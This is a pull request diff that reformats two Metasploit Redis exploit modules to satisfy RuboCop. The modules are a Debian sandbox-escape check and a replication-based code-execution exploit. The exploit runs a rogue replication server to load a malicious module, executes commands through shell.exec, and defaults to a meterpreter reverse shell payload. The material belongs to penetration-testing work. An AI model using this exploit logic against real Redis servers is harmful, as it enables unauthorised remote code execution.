### PR TITLE
modules/exploits/linux/redis: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -142,21 +142,21 @@ class MetasploitModule < Msf::Exploit::Remote
     # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at
     # package somewhere and it's nice to get final verification via exploitation anyway.
     info_output = redis_command('INFO')
-    return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?
-    return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
-    return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
+    return CheckCode::Unknown('Failed authentication.') if info_output.nil?
+    return CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
+    return CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
 
     redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]
-    return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?
-    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
-    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
-    return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
+    return CheckCode::Safe('Could not extract a version number') if redis_version.nil?
+    return CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
+    return CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
+    return CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
 
     # okay, looks like a worthy candidate. Attempt exploitation.
     result = do_popen('id')
-    return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
+    return CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
 
-    Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")
+    CheckCode::Safe("Could not execute 'id' on the remote target.")
   ensure
     disconnect
   end

--- a/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
+++ b/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
@@ -12,46 +12,46 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Auxiliary::Redis
   include Msf::Module::Deprecated
 
-  moved_from "exploit/linux/redis/redis_unauth_exec"
+  moved_from 'exploit/linux/redis/redis_unauth_exec'
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Redis Replication Code Execution',
-      'Description'    => %q{
-        This module can be used to leverage the extension functionality added since Redis 4.0.0
-        to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
-        which called replication between master and slave.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'Redis Replication Code Execution',
+        'Description' => %q{
+          This module can be used to leverage the extension functionality added since Redis 4.0.0
+          to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
+          which called replication between master and slave.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Green-m  <greenm.xxoo[at]gmail.com>' # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
           [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
         ],
 
-      'Platform'       => 'linux',
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'Targets'        =>
-        [
-          ['Automatic',  {} ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          ['Automatic', {} ],
         ],
-      'DefaultOptions' => {
+        'DefaultOptions' => {
           'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
           'SRVPORT' => '6379'
         },
-      'Privileged'     => false,
-      'DisclosureDate' => '2018-11-13',
-      'DefaultTarget'  => 0,
-      'Notes'          =>
-        {
-          'Stability'   => [ SERVICE_RESOURCE_LOSS],
+        'Privileged' => false,
+        'DisclosureDate' => '2018-11-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ SERVICE_RESOURCE_LOSS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
-        },
-      ))
+        }
+      )
+    )
 
     register_options(
       [
@@ -76,25 +76,23 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
     # they are only vulnerable if we can run the CONFIG command, so try that
-    return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
+    return CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
 
     if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
       report_redis(redis_version)
     end
 
     unless redis_version
-      print_error('Cannot retrieve redis version, please check it manually')
-      return Exploit::CheckCode::Unknown
+      return CheckCode::Unknown('Cannot retrieve redis version, please check it manually')
     end
 
     # Only vulnerable to version 4.x or 5.x
     version = Rex::Version.new(redis_version)
     if version >= Rex::Version.new('4.0.0')
-      vprint_status("Redis version is #{redis_version}")
-      return Exploit::CheckCode::Vulnerable
+      return CheckCode::Vulnerable("Redis version is #{redis_version}")
     end
 
-    Exploit::CheckCode::Safe
+    CheckCode::Safe
   ensure
     disconnect
   end
@@ -105,11 +103,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if check_custom
-      @module_init_name = datastore['RedisModuleInit']    || Rex::Text.rand_text_alpha_lower(4..8)
-      @module_cmd       = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
+      @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8)
+      @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
     else
       @module_init_name = 'shell'
-      @module_cmd       = 'shell.exec'
+      @module_cmd = 'shell.exec'
     end
 
     if srvhost == '0.0.0.0'
@@ -136,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send the payload.
     #
     redis_command('SLAVEOF', srvhost, srvport.to_s)
-    redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
+    redis_command('CONFIG', 'SET', 'dbfilename', module_file.to_s)
     ::IO.select(nil, nil, nil, 2.0)
 
     # start the rogue server
@@ -153,9 +151,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Clean up
     Rex.sleep(2)
     register_file_for_cleanup("./#{module_file}")
-    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
-    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
-
+    # redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
+    # redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
   ensure
     disconnect
   end
@@ -165,31 +162,30 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def start_rogue_server
     begin
-      socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
+      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => srvhost, 'LocalPort' => srvport })
       print_status("Listening on #{srvhost}:#{srvport}")
     rescue Rex::BindFailed
       print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
       print_status("Listening on 0.0.0.0:#{srvport}")
-      socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport})
+      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => '0.0.0.0', 'LocalPort' => srvport })
     end
 
-    rsock = socket.accept()
+    rsock = socket.accept
     vprint_status('Accepted a connection')
 
     # Start negotiation
-    while true
+    loop do
       request = rsock.read(1024)
       vprint_status("in<<< #{request.inspect}")
-      response = ""
+      response = ''
       finish = false
 
-      case
-      when request.include?('PING')
+      if request.include?('PING')
         response = "+PONG\r\n"
-      when request.include?('REPLCONF')
+      elsif request.include?('REPLCONF')
         response = "+OK\r\n"
-      when request.include?('PSYNC') || request.include?('SYNC')
-        response  = "+FULLRESYNC #{'Z'*40} 1\r\n"
+      elsif request.include?('PSYNC') || request.include?('SYNC')
+        response = "+FULLRESYNC #{'Z' * 40} 1\r\n"
         response << "$#{payload_bin.length}\r\n"
         response << "#{payload_bin}\r\n"
         finish = true
@@ -198,23 +194,23 @@ class MetasploitModule < Msf::Exploit::Remote
       if response.length < 200
         vprint_status("out>>> #{response.inspect}")
       else
-        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
+        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..]}")
       end
 
       rsock.put(response)
 
-      if finish
-        print_status('Rogue server close...')
-        rsock.close()
-        socket.close()
-        break
-      end
+      next unless finish
+
+      print_status('Rogue server close...')
+      rsock.close
+      socket.close
+      break
     end
   end
 
   def pull_the_trigger
     if check_custom
-      redis_command("#{@module_cmd}")
+      redis_command(@module_cmd.to_s)
     else
       execute_cmdstager
     end
@@ -224,28 +220,30 @@ class MetasploitModule < Msf::Exploit::Remote
   # Parpare command stager for the pre-compiled payload.
   # And the command of module is hard-coded.
   #
-  def execute_command(cmd, opts = {})
-    redis_command('shell.exec',"#{cmd.to_s}") rescue nil
+  def execute_command(cmd, _opts = {})
+    redis_command('shell.exec', cmd.to_s)
+  rescue StandardError
+    nil
   end
 
   #
   # Generate source code file of payload to be compiled dynamicly.
   #
   def generate_code_file(buf)
-    template       = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
-    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))}
+    template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
+    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding)) }
   end
 
   def compile_payload
     make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
-    vprint_status("Clean old files")
-    vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
-    vprint_status(%x|make -C #{File.dirname(make_file)} clean|)
+    vprint_status('Clean old files')
+    vprint_status(`make -C #{File.dirname(make_file)}/rmutil clean`)
+    vprint_status(`make -C #{File.dirname(make_file)} clean`)
 
     print_status('Compile redis module extension file')
-    res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
-    if res.include? 'true'
-      print_good("Payload generated successfully! ")
+    res = `make -C #{File.dirname(make_file)} -f #{make_file} && echo true`
+    if res.include?('true')
+      print_good('Payload generated successfully! ')
     else
       print_error(res)
       fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
@@ -257,11 +255,11 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def check_env
     # check if linux
-    return false unless %x|uname -s 2>/dev/null|.include? "Linux"
+    return false unless `uname -s 2>/dev/null`.include?('Linux')
     # check if gcc installed
-    return false unless %x|command -v gcc && echo true|.include? "true"
+    return false unless `command -v gcc && echo true`.include?('true')
     # check if ld installed
-    return false unless %x|command -v ld && echo true|.include? "true"
+    return false unless `command -v ld && echo true`.include?('true')
 
     true
   end
@@ -277,7 +275,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def module_file
     return @module_file if @module_file
-    @module_file = datastore['RedisModuleName']  || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
+
+    @module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
   end
 
   def create_payload
@@ -287,10 +286,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def payload_bin
     return @payload_bin if @payload_bin
+
     if check_custom
       @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
     else
-      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp',  'exp.so'))
+      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so'))
     end
     @payload_bin
   end


### PR DESCRIPTION
All violations resolved with `rubocop -a`, except notes.

